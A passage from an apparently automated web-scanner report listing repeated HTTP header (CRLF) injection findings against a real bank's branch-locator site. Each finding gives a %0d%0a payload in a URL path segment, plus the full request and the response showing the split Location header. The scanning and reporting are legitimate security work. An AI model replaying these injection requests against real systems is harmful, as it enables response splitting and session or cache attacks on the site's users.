The value of REST URL parameter 4 is copied into the Location response header. The payload fd1b4%0d%0a599254476e1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/fd1b4%0d%0a599254476e1/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:23 GMT
Server: Apache
Set-Cookie: JSESSIONID=0F6FEDC1706B0BBCDF923DB420022E87.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/fd1b4
599254476e1/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.53. http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f7238%0d%0a4227c59f65e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/f7238%0d%0a4227c59f65e/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=921A11611569E03B2CC2E212E1310906.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/f7238
4227c59f65e/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.54. http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 72f0c%0d%0a13e587e4191 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/72f0c%0d%0a13e587e4191/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:01 GMT
Server: Apache
Set-Cookie: JSESSIONID=F19719C6B487DF7D3D048BE9CEF117A3.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/72f0c
13e587e4191/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.55. http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload cbc37%0d%0a4b2ec1e412 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/cbc37%0d%0a4b2ec1e412=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=4FFBA1ABD59D3DBEF0550752C3217BD9.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/cbc37
4b2ec1e412=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.56. http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c091d%0d%0a712f13d0ced was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/c091d%0d%0a712f13d0ced/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=3B47D1A003DADF940B6678442B56A33B.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/c091d
712f13d0ced/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.57. http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3a8e3%0d%0a7f8a12d0488 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/3a8e3%0d%0a7f8a12d0488/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=EC88F4B1CA81C06EB280A144839BC6F3.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/3a8e3
7f8a12d0488/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.58. http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 94ac2%0d%0a8c755d20baa was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/94ac2%0d%0a8c755d20baa/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:11 GMT
Server: Apache
Set-Cookie: JSESSIONID=7CAFC11025DB53B8E05EFADE122FC227.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/94ac2
8c755d20baa/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.59. http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 703c8%0d%0a9649200f86b was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/703c8%0d%0a9649200f86b/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:30 GMT
Server: Apache
Set-Cookie: JSESSIONID=02F3CCEF26CC3F38F19F5155EF3B0710.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/703c8
9649200f86b/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.60. http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 90edf%0d%0a1f50db21b90 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/90edf%0d%0a1f50db21b90=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=86013EAF0E21592D145FC77CA7EAD985.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/90edf
1f50db21b90=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.61. http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b76e7%0d%0af9f82cfa3bb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/b76e7%0d%0af9f82cfa3bb/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:27 GMT
Server: Apache
Set-Cookie: JSESSIONID=59FDCD42A92DBAF8C411EECE1E696294.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/b76e7
f9f82cfa3bb/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.62. http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5ec05%0d%0a3942ebbedab was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/205__E__Pine__St_74106_TULSA_OK/5ec05%0d%0a3942ebbedab/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:17 GMT
Server: Apache
Set-Cookie: JSESSIONID=23550C786D8AC205F40E7012EBF14969.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/5ec05
3942ebbedab/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.63. http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 35c7b%0d%0ae4deb85f100 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/35c7b%0d%0ae4deb85f100/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:36 GMT
Server: Apache
Set-Cookie: JSESSIONID=A823B03B971CE13FD4404BBFEC860185.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/35c7b
e4deb85f100/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.64. http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 19487%0d%0a1748c4b5167 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/205__E__Pine__St_74106_TULSA_OK/19487%0d%0a1748c4b5167/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:22 GMT
Server: Apache
Set-Cookie: JSESSIONID=DF80E9BB87E5CB189F24369632B74FC3.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/19487
1748c4b5167/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.65. http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload fe97a%0d%0aada2953b222 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/fe97a%0d%0aada2953b222=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:46 GMT
Server: Apache
Set-Cookie: JSESSIONID=507D1F1B5CDD576BBAFB0096EFDB534A.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/fe97a
ada2953b222=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.66. http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload b2f4f%0d%0add38d9c7f35 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/b2f4f%0d%0add38d9c7f35/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:21 GMT
Server: Apache
Set-Cookie: JSESSIONID=A2B8B620BD2C20DC5D99F82D19026A87.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/b2f4f
dd38d9c7f35/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.67. http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 1d778%0d%0ac2b453ec859 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/1d778%0d%0ac2b453ec859/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=C66F48E85741345B941B16654001573E.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/1d778
c2b453ec859/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.68. http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ede79%0d%0af08cf703f4d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/ede79%0d%0af08cf703f4d/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:30 GMT
Server: Apache
Set-Cookie: JSESSIONID=B46EF5C296AE758A73FB3C64D9BE7CFE.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/ede79
f08cf703f4d/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.69. http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 88aaf%0d%0ad52eb249539 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/88aaf%0d%0ad52eb249539/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:23 GMT
Server: Apache
Set-Cookie: JSESSIONID=21F39E7C022C55E9F104C781DEEE1A90.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/88aaf
d52eb249539/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.70. http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 380a8%0d%0a804633a896d was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/380a8%0d%0a804633a896d=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:40 GMT
Server: Apache
Set-Cookie: JSESSIONID=3EC1EB92D5407B14A88E2C234704CEE2.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/380a8
804633a896d=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.71. http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 1b668%0d%0a3ea80eec8ab was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1b668%0d%0a3ea80eec8ab/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:51 GMT
Server: Apache
Set-Cookie: JSESSIONID=1BCA1D26201606436DAE058793A7D6F0.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1b668
3ea80eec8ab/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.72. http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload af262%0d%0a5ad26766e1a was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/af262%0d%0a5ad26766e1a/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:15 GMT
Server: Apache
Set-Cookie: JSESSIONID=C9361D5C1FBC3A541062E56F0BA77380.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/af262
5ad26766e1a/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.73. http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
